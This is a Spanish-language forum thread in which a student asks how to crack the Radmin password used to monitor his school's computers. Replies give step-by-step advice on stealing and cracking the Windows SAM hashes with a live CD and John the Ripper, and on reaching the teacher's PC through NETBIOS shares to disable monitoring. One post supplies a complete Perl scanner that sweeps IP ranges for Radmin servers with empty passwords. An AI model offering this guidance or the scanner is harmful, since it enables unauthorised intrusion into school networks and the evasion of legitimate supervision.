Resultados 1 al 13 de 13

Radmin

  1. #1 Radmin 
    Medio
    Fecha de ingreso
    Sep 2006
    Mensajes
    89
    Descargas
    0
    Uploads
    0
    Que hay?!! ¿Alguien sabe si se puede crackear la contraseña de un servidor del radmin? Esque todos los ordenadores del insti estan conectados en red, con el fabuloso Radmin corriendo por ahì, supuestamente para poder vigilar a los alumnos
    Graaciass
    Citar  
     

  2. #2  
    Moderador HH
    Fecha de ingreso
    Dec 2001
    Ubicación
    Galiza
    Mensajes
    3.129
    Descargas
    0
    Uploads
    0
    Pufff, desde un sniffer tipo CAIN hasta un bug del Radmin pasando por fuerza bruta... no hagas preguntas sin contestación clara pq verás cosas como lo que yo te contesto.
    Las ideas son como las pulgas, saltan de unos a otros pero no pican a todos... (George Bernard Shaw)
    Citar  
     

  3. #3  
    Medio
    Fecha de ingreso
    Sep 2006
    Ubicación
    S3v1ll4
    Mensajes
    57
    Descargas
    0
    Uploads
    0
    Existe un xploit para el radmin y tb para el vnc, sabiendo su ip entras sin pass las cosas que inventan jajaa.

    S4lu2
    Citar  
     

  4. #4  
    Avanzado
    Fecha de ingreso
    Aug 2006
    Ubicación
    ssh -l root nasa.gov
    Mensajes
    196
    Descargas
    0
    Uploads
    0
    Cita Iniciado por School
    Existe un xploit para el radmin y tb para el vnc, sabiendo su ip entras sin pass las cosas que inventan jajaa.

    S4lu2

    Que exploit ?
    --== We can change the World if God gives us the source code ==--

    !!! @@@-- Read-The-Fucking-Rules --@@@ !!!
    Citar  
     

  5. #5  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.235
    Descargas
    0
    Uploads
    0
    School, ¿te refieres al artículo sobre eludir la autentificación en VNC?

    Un saludo.
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Mar 2006
    Ubicación
    en internet
    Mensajes
    441
    Descargas
    6
    Uploads
    0
    el lo que quiere es conseguir sacas la pass del radmin, cuya pass,lógicamente, no sabe,(por lo que leo de sus post) en este post quiere saber cual es el exploit que quita la pass del radmin i en otro como usar fuerza bruta para sacarla....es así LooKoo¿?
    Salu2
    P.D: si es así pregunta las cosas de forma más clara!!
    Es la hora de ponerse a estudiar!

    Constancia y Perseverancia ante todo!
    Citar  
     

  7. #7  
    Medio
    Fecha de ingreso
    Oct 2006
    Mensajes
    61
    Descargas
    0
    Uploads
    0
    En mi instituto también corria todo por el radmin!
    al principio estaba perdido, pero luego es bastante facil, hay muchísimas formas de ser administrador en el ordenador para después activar o desactivar radmin y demás cosas a tu gusto!
    Nos daban a cada alumno un ordenador de cuenta limitada de nombre "alumnoN" (N = un numero natural) en el cual no podías instalar nada y te monitoreaban el pc y podian controlarte.
    Pues bién ahora digo varias formas simples de conseguir administrador:

    1º) Crackear SAM y Hashes, o bien desde el archivo SAM en "/windows/system32/config" [[cuyo archivo no podras manipular una vez arrancado el OS, utliza otros métodos para cogerlo como; enchufar otro hard disk como principal y copiarlo, como meter alguna version livecd de linux como knoppix y copiando SAM a algún diskete, o de alguna otra forma más...]] o bien mediante la vulnerabilidad con el PID del proceso "lsass.exe". Una vez obtenidas las hashes, se desencriptan, un buen programa es Jhon The Ripper que corre bajo Msdos y del cual recomiendo leer algún manual, desencriptadas las hashes te da entre ellas, la contraseña del admin.

    2º) SIN SER MUY CANTOSO, Y utilizando recursos compartidos de NETBIOS, (suele funcionar) con un poco de ahinco conseguiras acceso al pc del profesor y desactivar radmin. No hace falta explicar NETBIOS (Recursos compartidos de windows), necesitas Msdos o algún programa con interface que actue sobre netbios; www.google.es y en caso de que haya una contraseña de por medio, algún programa de esos que hay miles sobre netbios!! en fi, una vez dentro del pc del profesor, desactiva el radmin sobre tí!

    Bueno, creo que me he explicado mas o menos bien... si teneis alguna duda postear, pero estas son cosas, que la mayoría ya sabeis
    Última edición por 3nD_SuB; 17-10-2006 a las 08:56
    Pr1v4t3_SuB c0MM4nD1_Cl1ck ()
    Text1.text = "FUCK YOU"
    c0MM4nD1.c4p710n = "Click aquí"
    3nD_SuB
    Citar  
     

  8. #8  
    Medio
    Fecha de ingreso
    Sep 2006
    Mensajes
    89
    Descargas
    0
    Uploads
    0
    Gracias 3nD_SuB, no caí en esa opción, aunque radmin puedo desactivarlo desde mi cuenta aunque no sea administrador, no quita esos privilegios.. probare con el Jhon haber que tal.
    saludosss
    Citar  
     

  9. #9  
    Medio
    Fecha de ingreso
    Sep 2006
    Ubicación
    S3v1ll4
    Mensajes
    57
    Descargas
    0
    Uploads
    0
    Bueno aqui un crackeador del radmin en perl, espero que te sirva boycot007, salu2

    Código:
    #!/usr/bin/perl
    use IO::Socket;
    
    
    ##################################################
    #           Radmin with empty password scanner
    #
    #                   usage: ./scan.pl 213.59.*.*
    #  thanx to Forb
    #             Coded by  Satir ([email protected]) from CyberLords [cyberlords.net]
    ################################################################################
    #####
    
    $|++; 
    use IO::Socket;  ## ????? ??????
    
    $pids=10;  ## Count of threads
    $port = 4899; ## Default port
    $tout = 5;  ## Default timeout
    $log = 'scan.log'; ## Default logfile
    
    
    $once=0;
    $fatal=0;
    
    if (@ARGV[0]=~/((.*)\.(.*)\.(.*)\.(.*))/) {
        $netmask = $1;
        $n1 = $2;
        $n2 = $3;
        $n3 = $4;
        $n4 = $5; 
    }
    
    quit("Incorrect port") if ($port=~/\D/);
    quit("No hostmask given") unless $netmask;
    check();
    
    while(1) {  
     @ips=@ipz[$once..$once+$pids]; 
     for ($i=0;$i<=$pids;$i++) {  
       unless($ips[$i]) { 
         killpidz();  
         exit print "Scan is complete\n";
       }
       
       
    if ($pid=fork()) {  
    push(@forked,$pid);
    } else {
         $res=check_radmin($ips[$i],$port);  
         logg($ips[$i],$res) if ($res ne 0);
         exit;
       }
     }
     $once+=$pids;
     killpidz();
    }
    
    sub check {  
     for ($i=0;$i<=254;$i++) {  
       $ipi = $i;  
       if ($n2 ne '*')  { $i = 254,$ipi = $n2 }  
       for ($j=0;$j<=254;$j++) {  
         $ipj = $j;  
         if ($n3 ne '*')  { $j = 254,$ipj = $n3 }  
           for ($k=1;$k<=254;$k++) {
             $ipk = $k;
             if ($n4 ne '*') { $k = 254,$ipi = $n2 }  
             my($ipaddr) = "$n1\.$ipi\.$ipj\.$ipk"; 
             chomp($ipaddr);
             push(@ipz,$ipaddr); 
          }
       }
     }
    }
    
    sub quit {
     my($reason)=@_;
     print "$reason\n" if $reason;
     exit; 
    }
    
    sub logg { 
     my($ip,$ans)=@_; 
     open(LOGG,">>$log");
     $str="NULL PASS!!!" if $ans eq 1;
     $str="need pass." if $ans eq 2;
     
     print LOGG "$ip:$port : $str\n";
     close(LOGG);
    }
    
    sub killpidz { 
     foreach (@forked) {
       chomp;
       waitpid($_,0);
       kill("TERM" => $_)
     }
     undef @forked;
    }
    
    
    sub check_radmin{
    ($host,$port)=@_;
    
     $sock=IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Photo => "tcp");
     
     if($sock)
     {
       $sock->send("\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08");
       $sock->recv($data,1024);  
       close($sock);
       
       @marks=split(//,$data);  
       foreach(@marks){
         $string.=unpack('H8', $_);
       }  
       if($string=~/a080/g){
         return 1;
       }
       else{
         return 2;
       } 
       
      }else { return 0;}
    }
    Citar  
     

  10. #10  
    Medio
    Fecha de ingreso
    Oct 2006
    Mensajes
    61
    Descargas
    0
    Uploads
    0
    digo yo que habrá que compilar ese código... ¿no?
    Pr1v4t3_SuB c0MM4nD1_Cl1ck ()
    Text1.text = "FUCK YOU"
    c0MM4nD1.c4p710n = "Click aquí"
    3nD_SuB
    Citar  
     

  11. #11  
    Medio
    Fecha de ingreso
    Sep 2006
    Mensajes
    89
    Descargas
    0
    Uploads
    0
    Gracias school lo probaré, ya comentare los resultados :P
    Citar  
     

  12. #12  
    Moderador HH
    Fecha de ingreso
    Dec 2001
    Ubicación
    Galiza
    Mensajes
    3.129
    Descargas
    0
    Uploads
    0
    Compilar perl?
    Las ideas son como las pulgas, saltan de unos a otros pero no pican a todos... (George Bernard Shaw)
    Citar  
     

  13. #13  
    Medio
    Fecha de ingreso
    Sep 2006
    Ubicación
    S3v1ll4
    Mensajes
    57
    Descargas
    0
    Uploads
    0
    Compilar perl?
    jejeje

    Active perl
    Citar  
     

Temas similares

  1. Problemas cn radmin en win 7
    Por Snc4 en el foro GENERAL
    Respuestas: 6
    Último mensaje: 23-09-2011, 03:19
  2. Radmin 3.4 y Hamachi
    Por Rik en el foro REDES Y TECNOLOGIAS WIRELESS
    Respuestas: 1
    Último mensaje: 27-11-2009, 16:53
  3. utilizando el radmin
    Por 40Che en el foro INTRUSION
    Respuestas: 1
    Último mensaje: 05-01-2007, 19:27
  4. Radmin
    Por LooKoo en el foro GENERAL
    Respuestas: 5
    Último mensaje: 17-10-2006, 20:11
  5. Password radmin
    Por vatio666 en el foro INGENIERIA INVERSA
    Respuestas: 1
    Último mensaje: 06-09-2006, 00:43

Marcadores

Marcadores